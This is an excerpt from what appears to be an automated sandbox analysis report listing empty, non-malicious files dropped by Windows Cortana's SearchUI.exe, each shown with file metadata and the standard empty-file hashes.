                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MSPaint_8wekyb3d8bbwe!Microsoft_MSPaint
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Messaging_8wekyb3d8bbwe!x27e26f40ye031y48a6yb130yd1f20388991ax
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Microsoft3DViewer_8wekyb3d8bbwe!Microsoft_Microsoft3DViewer
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftSolitaireCollection_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftStickyNotes_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_OneNote_8wekyb3d8bbwe!microsoft_onenoteim
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_OneConnect_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_PPIProjection_cw5n1h2txyewy!Microsoft_PPIProjection
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Print3D_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsAlarms_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCalculator_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCamera_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsFeedbackHub_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsMaps_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsStore_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Cortana_cw5n1h2txyewy!CortanaUI
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_HolographicFirstRun_cw5n1h2txyewy!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_SecHealthUI_cw5n1h2txyewy!SecHealthUI
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_XboxApp_8wekyb3d8bbwe!Microsoft_XboxApp
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneMusic_8wekyb3d8bbwe!Microsoft_ZuneMusic
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_ZuneVideo_8wekyb3d8bbwe!Microsoft_ZuneVideo
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_calendar
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_mail
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\~ortanaUnifiedTileModelCache.tmp
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
